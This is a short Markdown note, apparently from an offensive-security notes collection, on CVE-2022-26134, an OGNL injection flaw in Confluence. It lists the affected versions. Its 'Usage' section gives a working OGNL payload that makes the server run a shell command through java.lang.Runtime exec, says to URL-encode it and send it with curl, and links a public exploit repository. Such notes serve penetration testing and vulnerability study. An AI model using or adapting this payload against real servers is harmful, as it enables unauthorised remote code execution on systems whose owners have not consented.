killchain-compendium/Exploits/Java/Confluence OGNL.md

24 lines
558 B
Markdown
Raw Normal View History

2022-11-13 22:38:01 +01:00
# CVE-2022-26134
* [NIST CVE-2022-26134](https://nvd.nist.gov/vuln/detail/CVE-2022-26134)
* Confluence versions:
* 1.3.0 to 7.4.17
* 7.13.0 to 7.13.7
* 7.14.0 to 7.14.3
* 7.15.0 to 7.15.2
* 7.16.0 to 7.16.4
* 7.17.0 to 7.17.4
* 7.18.0 to 7.18.1
* Object Graph Navigation Language (OGNL)
## Usage
* Payload is a GET request which is set via the URI
```sh
${@java.lang.Runtime@getRuntime().exec("touch /tmp/exploit")}/
```
* URL encode and curl for PoC
* Use [Naqwda's exploit](https://github.com/Nwqda/CVE-2022-26134.git)